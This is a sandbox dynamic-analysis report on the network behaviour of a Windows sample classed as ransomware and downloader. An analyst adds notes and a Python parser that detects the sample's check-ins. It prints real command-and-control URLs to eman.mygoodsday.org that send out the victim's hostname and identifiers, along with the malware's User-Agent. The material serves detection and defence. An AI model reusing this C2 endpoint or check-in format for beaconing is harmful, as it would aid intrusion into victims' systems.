242713ef...bd95 | Network
VTI SCORE: 95/100
Dynamic Analysis Report
Classification: Dropper, Riskware, Downloader, Trojan, Ransomware

242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95 (SHA256)

CURRENT_DIRnwovkcyl.exe

Windows Exe (x86-32)

Created at 2018-10-03 03:03:00

Notifications (1/1)

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

Network Overview

Hosts (4)

Hostname | IP Address | Location | Protocols | Reputation Status | WHOIS Data
eman.mygoodsday.org | 104.218.120.192 | Amsterdam (Netherlands) | HTTP, TCP, UDP | Not Queried | available via link
lhniwsj | 192.168.0.96 | - | - | Not Queried | available via link
- | 157.56.120.207 | - | UDP | Not Queried | Not Queried
- | 157.56.120.208 | - | UDP | Not Queried | Not Queried

lhniwsj / 192.168.0.96 is the analysis VM itself (it is the local address of every PCAP session below and the value returned by the sample's Get Hostname call); the only host the sample deliberately contacts is eman.mygoodsday.org.
DNS Queries (2)

Hostname | Categories | Names | Source | Reputation Status
eman.mygoodsday.org | - | - | Function Log | Not Queried
lhniwsj | - | - | Function Log | Not Queried
URLs (3)

URL | Categories | Names | Source | HTTP Status Code | Reputation Status
http://eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=START | - | - | Function Log | OK (200) | Not Queried
http://eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=[ALL]460F9943EA70F103 | - | - | Function Log | OK (200) | Not Queried
http://eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=460F9943EA70F103|2891|1GB | - | - | Function Log | OK (200) | Not Queried

All three requests go to the same script with the same fixed parameters: apikey is a constant (eman_api_key), compuser is the victim hostname and a 12-character identifier joined by "|" (LHNIWSJ|CIiHmnxMn6Ps), and sid is a 16-character session identifier that stays the same across the run. Only phase changes: START, then [ALL] followed by a 16-digit hex value, then that same hex value followed by "|2891|1GB". The report does not state what the last two fields mean; the path, the parameter set, and the phase grammar are the stable part of this check-in and are what a detection should key on rather than the domain alone.

Connections

DNS (5)

Operation | Additional Information | Success | Count
Get Hostname | name_out = LHnIwsj | True | 1
Resolve Name | host = eman.mygoodsday.org, address_out = 104.218.120.192, service = 80 | True | 3
Resolve Name | host = LHnIwsj, address_out = 192.168.0.96 | True | 1
TCP Sessions (6)

Total Data Sent: 2.24 KB
Total Data Received: 1.71 KB
Contacted Host Count: 2
Contacted Hosts: 104.218.120.192, 104.218.120.192:80

Both "contacted hosts" are the same server; the report counts the function-log view (104.218.120.192) and the PCAP view (104.218.120.192:80) separately. Sessions #1 to #3 are the function-log records of the three connections and sessions #4 to #6 are the PCAP records of the same three connections, matched by local port (49426, 49505, 49950). The function log shows the local address as 0.0.0.0 because the socket was not explicitly bound; the PCAP shows the real source address 192.168.0.96.
TCP Session #1

Handle: 0x280
Address Family: AF_INET
Type: SOCK_STREAM
Protocol: IPPROTO_TCP
Remote Address: 104.218.120.192
Remote Port: 80
Local Address: 0.0.0.0
Local Port: 49426
Data Sent: 0.22 KB
Data Received: 0.17 KB

Operation | Additional Information | Success | Count
Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM | True | 1
Connect | remote_address = 104.218.120.192, remote_port = 80 | True | 1
Send | flags = NO_FLAG_SET, size = 229, size_out = 229 | True | 1
Receive | flags = NO_FLAG_SET, size = 178, size_out = 178 | True | 1
Close | type = SOCK_STREAM | True | 1
TCP Session #2

Handle: 0x2a8
Address Family: AF_INET
Type: SOCK_STREAM
Protocol: IPPROTO_TCP
Remote Address: 104.218.120.192
Remote Port: 80
Local Address: 0.0.0.0
Local Port: 49505
Data Sent: 0.24 KB
Data Received: 0.17 KB

Operation | Additional Information | Success | Count
Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM | True | 1
Connect | remote_address = 104.218.120.192, remote_port = 80 | True | 1
Send | flags = NO_FLAG_SET, size = 245, size_out = 245 | True | 1
Receive | flags = NO_FLAG_SET, size = 178, size_out = 178 | True | 1
Close | type = SOCK_STREAM | True | 1
TCP Session #3

Handle: 0x288
Address Family: AF_INET
Type: SOCK_STREAM
Protocol: IPPROTO_TCP
Remote Address: 104.218.120.192
Remote Port: 80
Local Address: 0.0.0.0
Local Port: 49950
Data Sent: 0.24 KB
Data Received: 0.17 KB

Operation | Additional Information | Success | Count
Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM | True | 1
Connect | remote_address = 104.218.120.192, remote_port = 80 | True | 1
Send | flags = NO_FLAG_SET, size = 249, size_out = 249 | True | 1
Receive | flags = NO_FLAG_SET, size = 178, size_out = 178 | True | 1
Close | type = SOCK_STREAM | True | 1
TCP Session #4

Source: PCAP
Stream ID: 0
Remote Address: 104.218.120.192
Remote Port: 80
Local Address: 192.168.0.96
Local Port: 49426
Data Sent: 0.50 KB
Data Received: 0.40 KB

Time | Highest Layer | Additional Information | Success
16.890172 s | TCP | Data Sent: 0.06 KB, Data Received: 0.06 KB | True
16.912368 s | TCP | Data Sent: 0.05 KB, Data Received: 0.23 KB | True
16.913527 s | HTTP | Data Sent: 0.28 KB, Data Received: 0.05 KB | True
17.076747 s | TCP | Data Sent: 0.05 KB, Data Received: 0.05 KB | True
17.098214 s | TCP | Data Sent: 0.05 KB, Data Received: 0.00 KB | False
TCP Session #5

Source: PCAP
Stream ID: 12
Remote Address: 104.218.120.192
Remote Port: 80
Local Address: 192.168.0.96
Local Port: 49950
Data Sent: 0.52 KB
Data Received: 0.40 KB

Time | Highest Layer | Additional Information | Success
134.106965 s | TCP | Data Sent: 0.06 KB, Data Received: 0.06 KB | True
134.125823 s | TCP | Data Sent: 0.05 KB, Data Received: 0.23 KB | True
134.128745 s | HTTP | Data Sent: 0.30 KB, Data Received: 0.05 KB | True
134.281792 s | TCP | Data Sent: 0.05 KB, Data Received: 0.05 KB | True
134.300292 s | TCP | Data Sent: 0.05 KB, Data Received: 0.00 KB | False
TCP Session #6

Source: PCAP
Stream ID: 5
Remote Address: 104.218.120.192
Remote Port: 80
Local Address: 192.168.0.96
Local Port: 49505
Data Sent: 0.51 KB
Data Received: 0.40 KB

Time | Highest Layer | Additional Information | Success
29.044740 s | TCP | Data Sent: 0.06 KB, Data Received: 0.06 KB | True
29.068192 s | TCP | Data Sent: 0.05 KB, Data Received: 0.23 KB | True
29.068909 s | HTTP | Data Sent: 0.29 KB, Data Received: 0.05 KB | True
29.243864 s | TCP | Data Sent: 0.05 KB, Data Received: 0.05 KB | True
29.445422 s | TCP | Data Sent: 0.05 KB, Data Received: 0.00 KB | False
UDP Sessions (3)

Total Data Sent: 2.46 KB
Total Data Received: 2.64 KB
Contacted Host Count: 3
Contacted Hosts: 192.168.0.1, 157.56.120.207, 157.56.120.208

Session #1 is the VM's DNS traffic to its local resolver (192.168.0.1:53). Sessions #2 and #3 go to UDP port 3544, the Teredo tunnelling port, and carry ICMPv6 and IPv6 packets encapsulated in UDP, which is the shape of Windows Teredo server qualification and keep-alive traffic. Treat the two 157.56.120.x hosts as operating-system background noise rather than as sample indicators unless other evidence ties them to the sample.
UDP Session #1

Source: PCAP
Stream ID: 104
Remote Address: 192.168.0.1
Remote Port: 53
Local Address: 192.168.0.96
Local Port: 62901
Data Sent: 0.15 KB
Data Received: 0.24 KB

Time | Highest Layer | Additional Information | Success
14.083024 s | DNS | Data Sent: 0.08 KB, Data Received: 0.15 KB | True
15.607461 s | DNS | Data Sent: 0.08 KB, Data Received: 0.09 KB | True
UDP Session #2

Source: PCAP
Stream ID: 144
Remote Address: 157.56.120.207
Remote Port: 3544
Local Address: 192.168.0.96
Local Port: 50249
Data Sent: 2.21 KB
Data Received: 2.25 KB

Time | Highest Layer | Additional Information | Success
33.391598 s | ICMPV6 | Data Sent: 0.10 KB, Data Received: 0.15 KB | True
41.645215 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
46.331574 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
60.444547 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
69.618466 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
90.035365 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
94.800160 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
123.145267 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
129.509915 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
137.515052 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
139.384332 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
141.290905 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
144.077494 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
148.005067 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
149.992170 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
151.816693 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
158.590501 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
168.033587 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
177.933937 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
193.152436 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
194.815792 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
200.084645 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
202.083030 s | IPV6 | Data Sent: 0.10 KB, Data Received: 0.10 KB | True
UDP Session #3

Source: PCAP
Stream ID: 145
Remote Address: 157.56.120.208
Remote Port: 3544
Local Address: 192.168.0.96
Local Port: 50249
Data Sent: 0.10 KB
Data Received: 0.15 KB

Time | Highest Layer | Additional Information | Success
33.454531 s | ICMPV6 | Data Sent: 0.10 KB, Data Received: 0.15 KB | True
HTTP Sessions (3)

Total Data Sent: 0.71 KB
Total Data Received: 0.52 KB
Contacted Host Count: 1
Contacted Hosts: eman.mygoodsday.org

Each session is opened through WinHTTP with WINHTTP_ACCESS_TYPE_NO_PROXY, so the sample sends its requests directly to port 80 and ignores any proxy configured on the host; on a proxied network these check-ins would appear in egress firewall or IDS logs, not in the proxy log. The requests are HTTP/1.0 GETs carrying the User-Agent "Mozilla/4.0 (compatible; Synapse)", which is the default user agent of the Synapse TCP/IP library for Delphi and Free Pascal; it is a usable indicator in combination with the URL shape but weak on its own, since legitimate Synapse-based software sends it too. Every response is exactly 178 bytes.
HTTP Session #1

Source: Function Log
User Agent: Mozilla/4.0 (compatible; Synapse)
Server Name: eman.mygoodsday.org
Server Port: 80
Data Sent: 0.22 KB
Data Received: 0.17 KB

Operation | Additional Information | Success | Count
Open Session | user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS | True | 1
Open Connection | protocol = http, server_name = eman.mygoodsday.org, server_port = 80 | True | 1
Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=START | True | 1
Send HTTP Request | headers = connection: keep-alive, host: eman.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=START | True | 1
Read Response | size = 178, size_out = 178 | True | 1
Close Session | - | True | 1
HTTP Session #2

Source: Function Log
User Agent: Mozilla/4.0 (compatible; Synapse)
Server Name: eman.mygoodsday.org
Server Port: 80
Data Sent: 0.24 KB
Data Received: 0.17 KB

Operation | Additional Information | Success | Count
Open Session | user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS | True | 1
Open Connection | protocol = http, server_name = eman.mygoodsday.org, server_port = 80 | True | 1
Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=[ALL]460F9943EA70F103 | True | 1
Send HTTP Request | headers = connection: keep-alive, host: eman.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=[ALL]460F9943EA70F103 | True | 1
Read Response | size = 178, size_out = 178 | True | 1
Close Session | - | True | 1
HTTP Session #3

Source: Function Log
User Agent: Mozilla/4.0 (compatible; Synapse)
Server Name: eman.mygoodsday.org
Server Port: 80
Data Sent: 0.24 KB
Data Received: 0.17 KB

Operation | Additional Information | Success | Count
Open Session | user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS | True | 1
Open Connection | protocol = http, server_name = eman.mygoodsday.org, server_port = 80 | True | 1
Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=460F9943EA70F103|2891|1GB | True | 1
Send HTTP Request | headers = connection: keep-alive, host: eman.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=460F9943EA70F103|2891|1GB | True | 1
Read Response | size = 178, size_out = 178 | True | 1
Close Session | - | True | 1
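The three addrecord.php requests above share a fixed path, a fixed parameter set and a small phase grammar, which is a better detection key than the domain. The following is an added example written for this page, not code from VMRay or from the sample: it parses the check-in URL into its fields and runs that parser over a constructed, tab-separated HTTP request log of the kind an IDS would produce (the proxy log is the wrong place to look, since the sample bypasses the system proxy). It goes beyond the report in one way: it matches on URL shape for any host, and reports the known C2 domain and the Synapse User-Agent as separate corroborating flags, so a renamed domain is still caught. The log lines, the function names and the field names are my own; the three URLs, the domain and the User-Agent string are copied from the report.

```python
"""Parse and detect the addrecord.php check-in seen in the report.

The three URLs, the C2 domain and the User-Agent are copied from the report.
The log format, the sample log lines and every function name are constructed
for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Indicators copied from the report's URL and HTTP Session tables.
C2_HOST = "eman.mygoodsday.org"
C2_PATH = "/addrecord.php"
C2_USER_AGENT = "Mozilla/4.0 (compatible; Synapse)"
REQUIRED_PARAMS = ("apikey", "compuser", "sid", "phase")

# Syntactic shape of the three observed phase values: START, [ALL]<16 hex>,
# <16 hex>|<digits>|<token>. The report does not say what the last two
# fields mean, so only the shape is checked.
PHASE_RE = re.compile(r"^(START|\[ALL\][0-9A-F]{16}|[0-9A-F]{16}\|\d+\|\w+)$")


def parse_checkin(url):
    """Return the check-in fields if url has the addrecord.php shape, else None.

    Matching is on path and parameter set, not on the host, so a renamed C2
    domain is still caught; the host is returned for the caller to judge.
    """
    parts = urlsplit(url)
    if parts.path != C2_PATH:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if any(p not in qs for p in REQUIRED_PARAMS):
        return None
    # compuser is '<victim hostname>|<12-char id>' in the report.
    victim_host, _, victim_id = qs["compuser"][0].partition("|")
    phase = qs["phase"][0]
    return {
        "host": parts.hostname,
        "apikey": qs["apikey"][0],
        "victim_host": victim_host,
        "victim_id": victim_id,
        "sid": qs["sid"][0],
        "phase": phase,
        "phase_shape_ok": bool(PHASE_RE.match(phase)),
    }


def scan_http_log(text):
    """Return one alert dict per log line whose URL has the check-in shape.

    Input lines are tab-separated: time, client, method, url, status, user-agent
    (a constructed format; adapt the split for a real IDS log).
    """
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status, ua = line.split("\t")
        fields = parse_checkin(url)
        if fields is None:
            continue
        # Two corroborating signals. The Synapse UA alone is weak (it is a
        # legitimate library default) and the domain alone stops working once
        # the C2 moves; together with the URL shape they are strong.
        fields.update(
            time=float(ts), client=client, method=method, status=int(status),
            known_c2_host=(fields["host"] == C2_HOST),
            synapse_ua=(ua == C2_USER_AGENT),
        )
        alerts.append(fields)
    return alerts


# Constructed log. Lines 1-3 carry the three URLs and timings from the report;
# line 4 is the same URL shape on another host, line 5 is benign filler.
SAMPLE_LOG = """\
16.91\t192.168.0.96\tGET\thttp://eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=START\t200\tMozilla/4.0 (compatible; Synapse)
29.07\t192.168.0.96\tGET\thttp://eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=[ALL]460F9943EA70F103\t200\tMozilla/4.0 (compatible; Synapse)
134.13\t192.168.0.96\tGET\thttp://eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=460F9943EA70F103|2891|1GB\t200\tMozilla/4.0 (compatible; Synapse)
140.00\t192.168.0.96\tGET\thttp://example.com/addrecord.php?apikey=x&compuser=a|b&sid=c&phase=START\t200\tMozilla/5.0
141.00\t192.168.0.96\tGET\thttp://eman.mygoodsday.org/index.html\t404\tMozilla/5.0
"""

if __name__ == "__main__":
    for a in scan_http_log(SAMPLE_LOG):
        print(f"{a['time']:>7.2f}s {a['client']} -> {a['host']} "
              f"victim={a['victim_host']}|{a['victim_id']} sid={a['sid']} "
              f"phase={a['phase']} known_c2={a['known_c2_host']} "
              f"synapse_ua={a['synapse_ua']}")
```

Run on the sample log, the scanner reports the three sandbox check-ins with both flags set, and the example.com line with the URL shape only, which is the case a domain-only blocklist would miss. The phase regex is deliberately strict about the 16-hex identifier; loosen it if later samples use a different length.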